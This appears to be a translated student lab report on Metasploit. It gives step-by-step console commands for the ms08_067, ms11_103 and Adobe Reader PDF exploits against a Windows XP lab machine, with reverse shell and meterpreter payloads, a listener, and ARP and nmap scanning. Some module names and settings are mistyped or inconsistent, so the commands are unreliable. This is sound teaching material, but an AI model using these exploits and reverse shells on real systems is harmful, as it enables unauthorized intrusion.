20155328 Network attack and defense experiment 5: MSF basic application
Practice content and process records
1. Windows service penetration attack——ms08_067
Attacker: Kali
Target: WindowsXP (English version)
The first step is to check the IP of the attacking aircraft and the target aircraft respectively.
In the kali terminal, enter msfconsole
the msf console and enter the following commands in sequence:
use exploit/windows/smb/ms08_067_netapiuse exploit/windows/smb/ms08_067_netapi
show payloads
set payload generic/shell_reverse_tcp
set LHOST 192.168.127.138
set LPORT 5328
set RHOST 192.168.127.139
set target 0
exploit
If the attack is successful, you can see that the system information of the target drone has been obtained:
2. Browser penetration attack——ms11_103
Enter msfconsole in the kali terminal to open the msf console and enter the following parameters:
The attacked host can see that the webpage cannot be opened normally:
Back in kali, enter the following command:
sessions
sessions -i n//n为显示的最大进程号
It can be seen that the attack was successful.
3. Penetration attacks against Adobe Reader
Enter the msf console in kali and enter the following command:
use windows/fileformat/adobe)cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.127.139
set LPORT 5328
set FILENAME 20155328.pdf
exploit
Generated PDF:
Copy the generated PDF to the target machine.
Enter back in kali, enter the monitoring module, and enter the following command:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.127.139
set LPORT 5328
exploit
Then open the PDF on the target machine:
The attack aircraft showed that the attack was successful:
Fourth, the application of Aux auxiliary module
1.browser_info
Enter in the kali terminal to show auxiliary
see which modules are in aux, and finally select gather/browser_info.
After entering the msf console, enter the following commands in sequence:
use auxiliary/gather_browser_info
set SRVHOST 192.168.127.138 //kali的IP
set SRVPORT 5328
exploit
You can see that the URL is generated and Server Starts.
Copy the link and access it in the target machine (WindowsXP):
Back to kali, you can see that the browser information of the target machine to access the url has been obtained.
2.arp_sweep
First enter the following command in the kali terminal to manually create a database required by msf:
service postgresql start
msfdb start
Then enter to msfconsole
open msf, enter the command use auxiliary/scanner/discovery/arp_sweep
to enter the module, and set the parameters: (RHOSTS fills in the network segment where kali is located)
After setting, enter run
, you can see that in addition to your own host IP, there are three other IPs:
Enter the command (target IP) in msf, db_nmap -O 192.168.127.139
and you can see the open port number, which is the target operating system of the target.
basic question answer
Explain what is exploit, payload, encode in your own words.
Exploit: Take advantage of vulnerabilities or everything that can be exploited to obtain user permissions, tamper with file information, etc.
Payload: A piece of code executed on the target machine, which can bounce connections.
encode: encode the feature code and change the feature code.
Practice summary and experience
This experiment is mainly done with more small modules, and it feels good. . Pretty awesome. . Keep up the good work.